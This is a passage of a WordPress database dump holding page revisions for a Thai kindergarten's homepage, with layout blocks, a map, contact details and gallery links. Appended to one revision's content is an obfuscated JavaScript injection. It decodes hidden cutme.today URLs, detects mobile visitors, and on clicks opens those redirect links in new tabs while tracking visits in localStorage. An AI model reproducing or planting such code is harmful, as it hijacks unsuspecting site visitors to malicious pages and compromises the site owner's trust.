ze\":{\"md\":11}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:45:30','2024-07-29 11:45:30','',19,'http://watprato.ssk.in.th/?p=110',0,'revision','',0),
(111,1,'2024-07-29 18:45:58','2024-07-29 11:45:58','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 